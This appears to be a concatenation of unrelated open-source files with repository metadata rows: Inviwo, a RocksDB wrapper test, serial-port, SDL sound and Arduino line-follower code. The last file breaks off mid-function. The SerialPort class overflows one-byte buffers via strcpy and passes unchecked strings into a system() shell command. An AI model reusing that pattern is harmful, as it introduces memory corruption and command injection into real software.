movementRay.myEnd = movementRay.myStart;
movementRay.myEnd.y += player.myVelocity.y;
if(DoRaycast(movementRay, true, hits))
{
closestBlockHit = GetClosestBlockHit(hits);
player.myPosition.y = closestBlockHit.myHitPosition.y - player.myVelocity.y;
player.myVelocity.y = 0.f;
}
movementRay.myEnd = movementRay.myStart;
movementRay.myEnd.x += player.myVelocity.x * 2.f;
ArrayClear(hits);
if(DoRaycast(movementRay, true, hits))
{
closestBlockHit = GetClosestBlockHit(hits);
player.myPosition.x = closestBlockHit.myHitPosition.x - player.myVelocity.x;
player.myVelocity.x = 0.f;
}
movementRay.myEnd = movementRay.myStart;
movementRay.myEnd.z += player.myVelocity.z * 2.f;
ArrayClear(hits);
if(DoRaycast(movementRay, true, hits))
{
closestBlockHit = GetClosestBlockHit(hits);
player.myPosition.z = closestBlockHit.myHitPosition.z - player.myVelocity.z;
player.myVelocity.z = 0.f;
}
player.myPosition += player.myVelocity;
} |
7256dbdc99cb6b7ae9a429e4d720e80143078cb8 | 48d5d1af9fc728a1a83ac91e2d335df037b57d22 | /modules/discretedata/include/modules/discretedata/dataset.h | a6147a04332b859d4c1bf763305ad5d955716332 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | inviwo/inviwo | 67601343919f3469c08beddd589df50153557a82 | f268803cafb5cde2ce640daabbd3ed1ac2c66a87 | refs/heads/master | 2023-08-17T04:11:51.970989 | 2023-08-14T13:56:17 | 2023-08-14T13:56:17 | 108,262,622 | 402 | 129 | BSD-2-Clause | 2023-09-13T15:19:38 | 2017-10-25T11:47:56 | C++ | UTF-8 | C++ | false | false | 10,167 | h | dataset.h | /*********************************************************************************
*
* Inviwo - Interactive Visualization Workshop
*
* Copyright (c) 2012-2023 Inviwo Foundation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*********************************************************************************/
#pragma once
#include <modules/discretedata/discretedatamoduledefine.h>
#include <inviwo/core/common/inviwo.h>
#include <inviwo/core/datastructures/datatraits.h>
#include <modules/discretedata/channels/bufferchannel.h>
#include <modules/discretedata/connectivity/connectivity.h>
#include <modules/discretedata/connectivity/structuredgrid.h>
namespace inviwo {
namespace discretedata {
struct ChannelCompare {
bool operator()(const std::pair<std::string, GridPrimitive>& u,
const std::pair<std::string, GridPrimitive>& v) const {
return (u.second < v.second) || u.first.compare(v.first) < 0;
}
};
// Map used for storing and querying channels by name and GridPrimitive type.
// Ordering by both name and GridPrimitive type,
using DataChannelMap =
std::map<std::pair<std::string, GridPrimitive>,
std::shared_ptr<const Channel>, // Shared channels, type information only as meta
// property
ChannelCompare>; // Lesser operator on string-Primitve pairs
/**
* \brief Data package containing structure by cell connectivity and data
* Conglomerate of data grid and several data channels assigned to grid dimensions.
*
* @author Anke Friederici and Tino Weinkauf
*/
class IVW_MODULE_DISCRETEDATA_API DataSet {
public:
DataSet(const std::shared_ptr<const Connectivity> grid) : grid(grid) {}
DataSet(GridPrimitive size, std::vector<ind>& numCellsPerDim)
: grid(std::make_shared<StructuredGrid>(size, numCellsPerDim)) {}
virtual ~DataSet() = default;
/**
* Default copy shares Channels and Connectivity
*/
DataSet(const DataSet& copy) = default;
public:
/**
* Returns a const typed shared pointer to the grid, if casting is possible.
*/
template <typename G>
const std::shared_ptr<const G> getGrid() const {
return std::dynamic_pointer_cast<const G, const Connectivity>(grid);
}
/**
* Returns a typed shared pointer to the grid, if casting is possible.
*/
template <typename G>
std::shared_ptr<G> getGrid() {
return grid;
}
// Channels
/**
* Add a new channel to the set
* @param channel Pointer to data, takes memory ownership
* @return Shared pointer for further handling
*/
std::shared_ptr<Channel> addChannel(Channel* channel);
/**
* Add a new channel to the set
* @param channel Shared pointer to data, remains valid
*/
void addChannel(std::shared_ptr<const Channel> channel);
/**
* Returns the first channel from an unordered list.
*/
std::shared_ptr<const Channel> getFirstChannel() const;
/**
* Returns the first channel from an unordered list.
*/
template <typename T, ind N>
std::shared_ptr<const DataChannel<T, N>> getFirstChannel() const;
/**
* Returns the specified channel, returns first instance found
* @param name Unique name of requested channel
* @param definedOn GridPrimitive type the channel is defined on, default 0D vertices
*/
std::shared_ptr<const Channel> getChannel(
const std::string& name, GridPrimitive definedOn = GridPrimitive::Vertex) const;
/**
* Returns the specified channel if it is in the desired format, returns first instance found
* @param key Unique name and GridPrimitive type the channel is defined on
*/
std::shared_ptr<const Channel> getChannel(std::pair<std::string, GridPrimitive>& key) const;
/**
* Returns the specified channel if it is in the desired format, returns first instance found
* @param name Unique name of requested channel
* @param definedOn GridPrimitive type the channel is defined on, default 0D vertices
*/
template <typename T, ind N>
std::shared_ptr<const DataChannel<T, N>> getChannel(
const std::string& name, GridPrimitive definedOn = GridPrimitive::Vertex) const;
/**
* Returns the specified buffer, converts to buffer or copies
* @param name Unique name of requested buffer
* @param definedOn GridPrimitive type the channel is defined on, default 0D vertices
*/
template <typename T, ind N>
std::shared_ptr<const BufferChannel<T, N>> getAsBuffer(
const std::string& name, GridPrimitive definedOn = GridPrimitive::Vertex) const;
/**
* Remove channel from set by shared pointer, data remains valid if shared outside
* Swaps position in vector
* @param channel Shared pointer to data
* @return Successful - channel was saved in the set indeed
*/
bool removeChannel(std::shared_ptr<const Channel> channel);
/**
* Number of channels currently held
*/
ind getNumChannels() const { return channels_.size(); }
std::vector<std::pair<std::string, GridPrimitive>> getChannelNames() const;
DataChannelMap::const_iterator cbegin() const { return channels_.cbegin(); }
DataChannelMap::const_iterator cend() const { return channels_.cend(); }
protected:
/**
* Set of data channels
* Indexed by name and defining dimension (0D vertices, 1D edges etc).
*/
DataChannelMap channels_;
public:
/**
* Connectivity of grid
* Several grid types are possible (rectlinear, structured, unstructured)
*/
const std::shared_ptr<const Connectivity> grid;
};
template <typename T, ind N>
std::shared_ptr<const DataChannel<T, N>> DataSet::getFirstChannel() const {
std::shared_ptr<const Channel> channel = getFirstChannel();
return std::dynamic_pointer_cast<const DataChannel<T, N>, const Channel>(channel);
}
template <typename T, ind N>
std::shared_ptr<const DataChannel<T, N>> DataSet::getChannel(const std::string& name,
GridPrimitive definedOn) const {
std::shared_ptr<const Channel> channel = getChannel(name.c_str(), definedOn);
return std::dynamic_pointer_cast<const DataChannel<T, N>, const Channel>(channel);
}
template <typename T, ind N>
std::shared_ptr<const BufferChannel<T, N>> DataSet::getAsBuffer(const std::string& name,
GridPrimitive definedOn) const {
std::shared_ptr<const Channel> channel = getChannel(name, definedOn);
// Data is not present in this data set.
if (!channel) return std::shared_ptr<const BufferChannel<T, N>>();
// Try to cast the channel to DataChannel<T, N>.
// Return empty shared_ptr if unsuccessful.
std::shared_ptr<const DataChannel<T, N>> dataChannel =
std::dynamic_pointer_cast<const DataChannel<T, N>, const Channel>(channel);
// Check for nullptr inside
if (!dataChannel) return std::shared_ptr<const BufferChannel<T, N>>();
// Try to cast the channel to buffer directly.
// If successful, return a shared pointer to the buffer directly.
// (Shared pointer remains valid and shares the refereNe counter).
std::shared_ptr<const BufferChannel<T, N>> bufferChannel =
std::dynamic_pointer_cast<const BufferChannel<T, N>, const Channel>(channel);
// Check for nullptr inside.
if (bufferChannel) return bufferChannel;
// Copy data over.
BufferChannel<T, N>* buffer = new BufferChannel<T, N>(dataChannel->size(), name, definedOn);
for (ind element = 0; element < dataChannel->size(); ++element)
dataChannel->fill(buffer->template get<std::array<T, N>>(element), element);
buffer->copyMetaDataFrom(*dataChannel.get());
return std::shared_ptr<const BufferChannel<T, N>>(buffer);
}
} // namespace discretedata
template <>
struct DataTraits<discretedata::DataSet> {
static std::string classIdentifier() { return "org.inviwo.DiscreteData"; }
static std::string dataName() { return "DataSet"; }
static uvec3 colorCode() { return uvec3(255, 144, 1); }
static Document info(const discretedata::DataSet& data) {
std::ostringstream oss;
oss << "Data set with " << data.getNumChannels() << " channels.";
auto channelKeyList = data.getChannelNames();
if (channelKeyList.size() != 0)
for (auto& channelKey : channelKeyList) {
auto channel = data.getChannel(channelKey);
oss << " " << channelKey.first << '[' << channel->getNumComponents() << "]["
<< channel->size() << ']' << "(Dim " << (int)channelKey.second << ')';
}
Document doc;
doc.append("p", oss.str());
return doc;
}
};
} // namespace inviwo
|
7e28e3b921cdb0508e6b6680bd030eb46db2abb8 | 6815d8a1ff667f850c90e25e3653c69065913b6e | /test/testall.cc | e718697f560b9a0751d212d282279e287c0c243b | [] | no_license | wuxingyi/newdb | 3881dcdf852fd2ecb3d49137c57895951afc5367 | 3c168c6e1df45fcd23ff0b39f6ff8971ab57f9b7 | refs/heads/master | 2021-01-11T00:00:52.121573 | 2016-11-18T13:37:44 | 2016-11-18T13:37:44 | 70,772,740 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 12,105 | cc | testall.cc | // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
// This source code is licensed under the BSD-style license found in the
// LICENSE file in the root directory of this source tree. An additional grant
// of patent rights can be found in the PATENTS file in the same directory.
// wuxingyi@le.com
// vimrc
// set expandtab
// set ts=8
// set sw=2
// set smarttab
#include <cstdio>
#include <string>
#include <iostream>
#include <sys/stat.h>
#include <sys/types.h>
#include <boost/program_options.hpp>
#include <boost/algorithm/string.hpp>
#include <memory>
#include <thread>
#include <vector>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <time.h>
#include <mutex>
#include <condition_variable>
#include "rocksdb/db.h"
#include "rocksdb/options.h"
#include "../include/newdb.h"
static int testkeys = 10;
static int sleeptime = 5;
class TEST
{
private:
int processoptions(int argc, char **argv)
{
using namespace boost::program_options;
options_description desc("Allowed options");
desc.add_options()
("help,h", "produce help message")
//("sync,s", value<bool>()->default_value(true), "whether use sync flag")
("keys,k", value<int>()->default_value(1), "how many keys to put")
("sleeptime,s", value<int>()->default_value(5), "how many seconds to sleep")
;
variables_map vm;
store(parse_command_line(argc, argv, desc), vm);
notify(vm);
if (vm.count("help"))
{
cout << desc;
return 0;
}
//actually we can always make syncflag false, because
//we can make use of vlog to recover.
//syncflag = vm["sync"].as<bool>();
testkeys = vm["keys"].as<int>();
sleeptime = vm["sleeptime"].as<int>();
return 0;
}
public:
TEST(int argc, char **argv)
{
processoptions(argc, argv);
}
private:
void TEST_Batch()
{
cout << __func__ << ": STARTED" << endl;
vector<string> keys;
vector<string> values;
vector<bool> deleteflags;
for (int i = 0; i < testkeys; i++)
{
string randkey = to_string(rand());
string randvalue = string(rand()/10000000, 'c');
keys.push_back(randkey);
values.push_back(randvalue);
deleteflags.push_back(false);
}
////update half of them
//for (int i = 0; i < testkeys; i++)
//{
// if (i % 2 == 0)
// {
// keys.push_back(keys[i]);
// values.push_back("wuxingyi");
// deleteflags.push_back(false);
// }
//}
//delete half of them
for (int i = 0; i < testkeys; i++)
{
//if (i % 2 == 1)
//{
keys.push_back(keys[i]);
values.push_back("");
deleteflags.push_back(true);
//}
}
DBOperations op;
op.DB_BatchPut(keys, values, deleteflags);
cout << __func__ << ": FINISHED" << endl;
}
//test case for conditional Compaction
void TEST_ConditionalCompact()
{
cout << __func__ << ": STARTED" << endl;
DBOperations op;
vector<string> keys;
for(int i = 0; i < testkeys; i++)
{
if (i % 100 == 0)
{
cout << "processing the " << i << "th entry" << endl;
}
int num = rand();
string value(num/1000000,'c');
string key = to_string(num);
keys.push_back(key);
op.DB_Put(key, value);
}
for(int i = 0; i < testkeys; i++)
{
//if (i % 3 == 0)
//{
op.DB_Delete(keys[i]);
//}
}
cout << __func__ << ": FINISHED" << endl;
//wait 5 seconds for compaction
//sleep(sleeptime);
//assert(0);
//TEST_QueryAll();
}
void TEST_QueryAll()
{
DBOperations op;
op.DB_QueryAll();
}
//query from key, at most limit entries
void TEST_QueryRange(const string &key, int limit)
{
DBOperations op;
op.DB_QueryRange(key, limit);
}
//query from key
void TEST_QueryFrom(const string &key)
{
DBOperations op;
op.DB_QueryFrom(key);
}
void TEST_writedelete()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value(num/10000000,'c');
string key = to_string(num);
//cout << "before Put: key is " << key << endl;
//cout << "before Put: key is " << key << ", value is " << value
// << " key length is " << key.size() << ", value length is " << value.size() << endl;
op.DB_Put(key, value);
value.clear();
op.DB_Delete(key);
//cout << "after Get: key is " << key << ", value is " << value
// << " key length is " << key.size() << ", value length is " << value.size() << endl;
cout << "---------------------------------------------------" << endl;
}
cout << __func__ << ": FINISHED" << endl;
}
void TEST_readwrite()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value(num/1000,'c');
string key = to_string(num);
//cout << "before Put: key is " << key << endl;
//cout << "before Put: key is " << key << ", value is " << value
// << " key length is " << key.size() << ", value length is " << value.size() << endl;
op.DB_Put(key, value);
value.clear();
op.DB_Get(ReadOptions(), key, value);
//cout << "after Get: key is " << key << ", value is " << value
// << " key length is " << key.size() << ", value length is " << value.size() << endl;
cout << "---------------------------------------------------" << endl;
}
cout << __func__ << ": FINISHED" << endl;
}
void TEST_SnapshotedIteration()
{
cout << __func__ << ": STARTED" << endl;
DBOperations op;
//first we write some data to db
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value(num/100000000,'c');
string key = to_string(num);
op.DB_Put(key, value);
}
cout << "we have put " << testkeys << " keys to db " << endl;
ReadOptions rop;
Snapshot *snapshot1 = op.DB_GetSnapshot();
rop.snapshot = snapshot1;
Iterator *it = op.DB_GetIterator(rop);
it->SeekToFirst();
string value;
int gotkeys = 0;
cout << "put another key after getting iterator, no db have "
<< testkeys + 1 << " keys" << endl;
op.DB_Put("test", "hehehe");
while(it->Valid())
{
int ret = op.DB_Get(rop, string(it->key().data(), it->key().size()), value);
if (0 == ret)
{
cout << "key is " << it->key().data() << endl;
cout << "value is " << value << endl;
//reserved keys are not count
++gotkeys;
}
it->Next();
}
delete it;
cout << __func__ << " we got " << gotkeys <<endl;
cout << __func__ << ": FINISHED" << endl;
}
void TEST_SnapshotVersionGet()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
int num = rand();
string key = to_string(num);
vector<Snapshot*> vs;
//put testkeys versions of key
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value("testhehehe" + to_string(i));
op.DB_Put(key, value);
Snapshot *snap = op.DB_GetSnapshot();
vs.push_back(snap);
}
Snapshot *myownsnap = op.DB_GetSnapshot();
for(int i = 0; i < testkeys; i++)
{
string value;
ReadOptions rop;
rop.snapshot = vs[i];
op.DB_Get(rop, key, value);
cout << "snapshotted version Get: key is " << key << ", value is " << value << endl;
op.DB_ReleaseSnapshot(vs[i]);
}
cout << "file should not be deleted because i own a snapshot " << endl;
op.DB_ReleaseSnapshot(myownsnap);
cout << "file can be deleted now because i released the snapshot " << endl;
cout << __func__ << ": FINISHED" << endl;
}
void TEST_SnapshotGet()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value(num/100000000,'c');
string key = to_string(num);
cout << "before Put: key is " << key << ", value is " << value << endl;
op.DB_Put(key, value);
ReadOptions rop;
Snapshot *snap = op.DB_GetSnapshot();
rop.snapshot = snap;
op.DB_Put(key, value + "hehehe");
op.DB_Get(ReadOptions(), key, value);
cout << "normal Get: key is " << key << ", value is " << value << endl;
op.DB_Get(rop, key, value);
cout << "snapshotted Get: key is " << key << ", value is " << value << endl;
cout << "---------------------------------------------------" << endl;
op.DB_ReleaseSnapshot(snap);
}
cout << __func__ << ": FINISHED" << endl;
}
void TEST_writeupdate()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value(num/10000000,'c');
string key = to_string(num);
//cout << "before Put: key is " << key << endl;
//cout << "before Put: key is " << key << ", value is " << value
// << " key length is " << key.size() << ", value length is " << value.size() << endl;
op.DB_Put(key, value);
op.DB_Put(key, value + "hehehe");
//cout << "after Get: key is " << key << ", value is " << value
// << " key length is " << key.size() << ", value length is " << value.size() << endl;
cout << "---------------------------------------------------" << endl;
}
cout << __func__ << ": FINISHED" << endl;
}
void TEST_MultiGet()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
vector<string> keys;
vector<string> values;
vector<int> ret;
for(int i = 0; i < testkeys; i++)
{
cout << "this is the " << i <<"th" << endl;
int num = rand();
string value(num/10000000,'c');
string key = to_string(num);
keys.push_back(key);
op.DB_Put(key, value);
}
keys.push_back("test");
ret = op.DB_MultiGet(ReadOptions(), keys, values);
for(int i = 0; i < ret.size(); i++)
{
if(0 == ret[i])
{
cout << values[i] << endl;
}
else if (-2 == ret[i])
{
cout << "key " << keys[i] << " not found" << endl;
}
}
cout << __func__ << ": FINISHED" << endl;
}
void TEST_Iterator()
{
DBOperations op;
cout << __func__ << ": STARTED" << endl;
ReadOptions rop;
Iterator *it = op.DB_GetIterator(rop);
cout << it->Valid() << endl;
it->SeekToFirst();
string value;
int gotkeys = 0;
while(it->Valid())
{
int ret = op.DB_Get(ReadOptions(), string(it->key().data(), it->key().size()), value);
if (0 == ret)
{
cout << "key is " << it->key().data() << endl;
cout << "value is " << value << endl;
//reserved keys are not count
++gotkeys;
}
it->Next();
}
delete it;
cout << __func__ << " we got " << gotkeys <<endl;
cout << __func__ << ": FINISHED" << endl;
}
public:
void run()
{
//TEST_MultiGet();
//TEST_SnapshotVersionGet();
//TEST_SnapshotGet();
//TEST_SnapshotedIteration();
//TEST_writedelete();
//TEST_writeupdate();
//TEST_readwrite();
TEST_ConditionalCompact();
//TEST_QueryAll();
//TEST_readwrite();
//TEST_Batch();
//TEST_QueryAll();
//TEST_QueryRange("66", 2);
//TEST_QueryFrom("66");
}
};
int main(int argc, char **argv)
{
DB db;
db.open();
TEST test(argc, argv);
for(int i = 0; i < 1; i++)
{
test.run();
}
sleep(10);
return 0;
}
|
ab6713ef51408c6e43f167b4c7880ff99722296e | f29a75693597687deb38fe4773d5e436724f3abb | /src/comm/SerialPort.cpp | a9097e2a327252f53235d8778c110b5e6cb8830a | [] | no_license | skipperno/NmeaApplication | 5612cff21c9fc557fc5d53e4c36a8ab4b20eaf48 | e8baed727f833e1d64909fa97036893e4838b603 | refs/heads/master | 2020-05-16T06:58:33.276571 | 2012-08-15T09:43:48 | 2012-08-15T09:43:48 | 1,705,540 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,298 | cpp | SerialPort.cpp | /*
* SerialPort.cpp
*
* Created on: Apr 27, 2011
* Author: georg
*/
#include "SerialPort.h"
#include <string.h>
#include <stdlib.h> //not used
SerialPort::SerialPort() {
// TODO Auto-generated constructor stub
}
SerialPort::~SerialPort() {
// TODO Auto-generated destructor stub
}
void SerialPort::configurePort(const char nmeaport[], const char baudrate[]) {
char ttyport[1];
char stty[50];
// tty port number is one less than NMEA port number
strcpy(ttyport, nmeaport);
ttyport[0] -= 1;
// Build up and execute the Linux stty command
strcpy(stty, "stty -F /dev/ttyS");
strcat(stty, ttyport);
strcat(stty, " ");
strcat(stty, baudrate);
strcat(stty, " raw -echo");
system(stty);
}
void SerialPort::openInputPort(const char nmeaport[]) {
char ttyport[1];
char tty[12];
// tty port number is one less than NMEA port number
strcpy(ttyport, nmeaport);
ttyport[0] -= 1;
// Open tty port for input
strcpy(tty, "/dev/ttyS");
strcat(tty, ttyport);
inpstream.open(tty, ios::out);
}
void SerialPort::openOutputPort(const char nmeaport[]) {
char ttyport[1];
char tty[12];
// tty port number is one less than NMEA port number
strcpy(ttyport, nmeaport);
ttyport[0] -= 1;
// Open tty port for output
strcpy(tty, "/dev/ttyS");
strcat(tty, ttyport);
outstream.open(tty, ios::out);
}
void SerialPort::closeInputPort() {
inpstream.close();
}
void SerialPort::closeOutputPort() {
outstream.close(); // // //
}
void SerialPort::receive(char* pBuffer, int *length) {
int nNotReceivedCounter = 0;
//char c;
int nLen;
*length = 0;
if (!inpstream.good()) {
printf("TODO: inputstream flags in not OK.\n");
}
while (true) {
nLen=inpstream.readsome(pBuffer, 10023);
if (nLen > 0) {
*length=nLen;
pBuffer[*length] =0;
//if (inpstream.readsome(&c, 1) != 0) {
nNotReceivedCounter = 0;
//printf("%d ", c);
// pBuffer[(*length)++] = c;
} else
return;/*if(nNotReceivedCounter > 5) {
//printf("END.\n");
return;
} else {
nNotReceivedCounter++;
usleep(30000);
}*/
}
//}
}
void SerialPort::send(char* pStream, int length) {
int i;
// Check if any valid data
if (length == 0)
return;
// Send valid data to output port
for (i = 0; i < length; i++) {
outstream << pStream[i];
}
outstream.flush();
}
|
b3b6e6d36e7da13a54f190b9e82318a921adc2b0 | f861d1f59a1ed4466da9bd6963336a502d434b62 | /a2/src/Sounds.cpp | 80fa77b6c7d6b0dc3ee08f0b39785c489404042e | [] | no_license | kyeah/Game-Technology | 4cb9c106e49b7f9733612689c35a719fe3554170 | c865937e111ef0fc9494173c5647c23213b8626e | refs/heads/master | 2021-01-19T21:25:43.506023 | 2014-05-08T23:26:50 | 2014-05-08T23:26:50 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,736 | cpp | Sounds.cpp | #include <stdio.h>
#include "Sounds.h"
void Sounds::init(){
//SETUP MUSIC
int audio_rate = 22050;
Uint16 audio_format = AUDIO_S16; /* 16-bit stereo */
int audio_channels = 2;
int audio_buffers = 4096;
SDL_Init(SDL_INIT_AUDIO);
/* This is where we open up our audio device. Mix_OpenAudio takes
as its parameters the audio format we'd /like/ to have. */
if(Mix_OpenAudio(audio_rate, audio_format, audio_channels, audio_buffers)) {
printf("Unable to open audio!\n");
exit(1);
}
/* If we actually care about what we got, we can ask here. In this
program we don't, but I'm showing the function call here anyway
in case we'd want to know later. */
Mix_QuerySpec(&audio_rate, &audio_format, &audio_channels);
//Mix_AllocateChannels(5);
}
void Sounds::playSound(int sound_type, int volume){
if(volume < 0 || volume > 128)
printf("VOLUME TOO LOUD");
else
Mix_Volume(-1, volume);
Mix_Music *sound = NULL;
switch(sound_type){
case 0:
sound = Mix_LoadMUS("media/sounds/swoosh-sound.mp3");
break;
case 1:
sound = Mix_LoadMUS("media/sounds/hit-sound.mp3");
break;
case 2:
//doesn't play in the background.
sound = Mix_LoadMUS("media/sounds/jazz.mp3");
break;
case 3:
//doesn't play in the background.
sound = Mix_LoadMUS("media/sounds/point.mp3");
break;
default:
printf("No Sound File Found\n");
}
if(sound != NULL){
Mix_PlayMusic(sound, 0);
}
}
|
562a3e888b53bcc75b0009c8d5ed48b3e9c13589 | 157fd7fe5e541c8ef7559b212078eb7a6dbf51c6 | /TRiAS/TRiAS/Obsolete/BasicScript/Bscrmenu.cxx | bbeff9d52249cb00f75f2b19f4db897fc6e8e7ae | [] | no_license | 15831944/TRiAS | d2bab6fd129a86fc2f06f2103d8bcd08237c49af | 840946b85dcefb34efc219446240e21f51d2c60d | refs/heads/master | 2020-09-05T05:56:39.624150 | 2012-11-11T02:24:49 | 2012-11-11T02:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,344 | cxx | Bscrmenu.cxx | // Menukommandos --------------------------------------------------------------
// File: BSCRMENU.CXX
#include "bscriptp.hxx"
#include "bscript.h" // ResourceKonstanten
bool CMacroScriptExtension :: OnInvokeScript (void)
{
CebDebugDlgInfo DlgInfo;
CebEntryInfo EntryInfo;
CebDebuggerDlg DebugDlg (&DlgInfo, ebInst(), EntryInfo, hWnd());
// nStatus (return code) will be one of the following values
// DRC_OUTOFMEMORY : Insufficient memory to create the debugger dialog
// DRC_CANTCREATEWINDOW : Unable to create window
// DRC_CANTFINDLIBRARY : Unable to locate the debugger control library
// DRC_CANCEL : Script was not saved on exit
// DRC_SAVED : Script was saved on exit
int nStatus = DebugDlg.Invoke();
char *pszError = NULL;
switch (nStatus) {
case DRC_CANCEL: // Only need to free debug.ei.lpWatchesOut
break;
case DRC_SAVED: // Free all output information
break;
case DRC_OUTOFMEMORY:
pszError = "Insufficient memory to create the Debugger Dialog!";
break;
case DRC_CANTCREATEWINDOW:
pszError = "Unable to create window!";
break;
case DRC_CANTFINDLIBRARY:
pszError = "Unable to locate the Debugger Control Library!";
break;
}
if (pszError) { // Display error condition
::AfxMessageBox (pszError);
return false;
}
return true;
}
|
e35e37a6226c6518470aecd5a292350ea53256c1 | 735297d0e7d44733fe6a05bf17bca3516fde03dd | /Strings/Program to compress Strings/main.cpp | 4a84350c8b92ef3c9ae9ca754c14c2ae96ad54ac | [] | no_license | saswatsk/Comprehensive-C | 741fb1ddfd238be10d474330af1e02ef1ed220bc | a250170c5743ec938028e6a4aac46c7d8a538e22 | refs/heads/main | 2023-08-17T13:19:31.789637 | 2021-09-17T15:57:29 | 2021-09-17T15:57:29 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 514 | cpp | main.cpp | // Compress the string i.e. aaabbccds --> a3b2c2d1s1
#include<iostream>
#include<cstring>
using namespace std;
int main() {
// input the string
string a;
cin >> a;
int count = 0;
for (int i = 0; i < a.length();) {
// print the element
cout<<a[i];
char temp = a[i];
// cal the count
while(a[i] == temp)
{
count++;
i++;
}
// print its count
cout<<count;
count = 0;
}
return 0;
} |
05b7b61f99c095575c7cb237555e76c2f114c1d6 | 6c3ac8f58f35a3539600957b42f331ba9ce0c9a2 | /src/libs/utlib/upgrade/upgradeenv.h | e5b545f5ce6efe504b76c4e2bfcba397ab20f9d3 | [] | no_license | asdf20122012/upgrade_tester | dc5c0a25b4cfe6f9a0ab4e8e97f9f3f705ea9487 | a8a39a16ae65b8720e7d770e9b7d4d0e08efecf9 | refs/heads/master | 2021-01-20T11:01:27.753177 | 2016-05-09T00:39:19 | 2016-05-09T00:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 568 | h | upgradeenv.h | #ifndef UT_LIB_UPGRADE_UPGRADEENV_H
#define UT_LIB_UPGRADE_UPGRADEENV_H
#include "corelib/upgrade/upgradeenv.h"
#include "upgrade_env_script_object.h"
namespace utlib{
namespace upgrade{
using BaseUpgradeEnv = sn::corelib::upgrade::UpgradeEnv;
class SN_CORELIB_EXPORT UpgradeEnv : public BaseUpgradeEnv
{
Q_OBJECT
public:
UpgradeEnv(const QString &host, const QString &username, const QString &password, const QString &dbname);
public:
virtual void initUpgradeEnv();
virtual ~UpgradeEnv();
};
}//upgrade
}//utlib
#endif // UT_LIB_UPGRADE_UPGRADEENV_H
|
7f414e37bef33513cea7581da67e4cdd3cb25136 | 1004986e800d2d8d00205f39a9452ef51b70487f | /lin_following_uart/lin_following_uart.ino | c7574547669251fbf074a64fb47fac30977f49fb | [] | no_license | TECHNOCRATSROBOTICS/ROBOCON_2018 | 4f1786369d217dc4a07525f13b123e185d89c10f | fdf1049c0775835c05b4a3e22a9cae9280984c22 | refs/heads/master | 2021-01-22T08:27:56.640475 | 2018-02-23T08:31:17 | 2018-02-23T08:31:17 | 92,615,967 | 5 | 16 | null | 2018-02-23T08:31:18 | 2017-05-27T18:14:11 | C++ | UTF-8 | C++ | false | false | 4,469 | ino | lin_following_uart.ino | const float Kp = 0.4; //0.3;//0.45; // Kp value that you have to change 0.45
const float Kd =30;//18;//25;
//kd=1;// Kd value that you have to change 150
const float setPoint = 35; // Middle point of sensor array
const float baseSpeed = 190; // Base speed for your motors
const float maxSpeed = 255; // Maximum speed for your motors
const byte rx = 0; // Defining pin 0 as Rx
const byte tx = 1; // Defining pin 1 as Tx
const byte serialEn = 2; // Connect UART output enable of LSA08 to pin 2
const byte junctionPulse = 3; // Connect JPULSE of LSA08 to pin 4
const byte dir1 = 4;
const byte pwm1 = 5; // rf
const byte dir2 = 6;
const byte pwm2 = 9; // lf
const byte dir3 = 8;
const byte pwm3 = 10; // lb
const byte dir4 = 13;
const byte pwm4 = 11; // rb
void setup() {
pinMode(serialEn,OUTPUT); // Setting serialEn as digital output pin
pinMode(junctionPulse,INPUT); // Setting junctionPulse as digital input pin
// Setting pin 10 - 13 as digital output pin
for(byte i=4;i<=13;i++) {
pinMode(i,OUTPUT);
}
// Setting initial condition of serialEn pin to HIGH
digitalWrite(serialEn,HIGH);
digitalWrite(junctionPulse,LOW);
// Setting the initial condition of motors
// make sure both PWM pins are LOW
digitalWrite(pwm1,LOW);
digitalWrite(pwm2,LOW);
digitalWrite(pwm3,LOW);
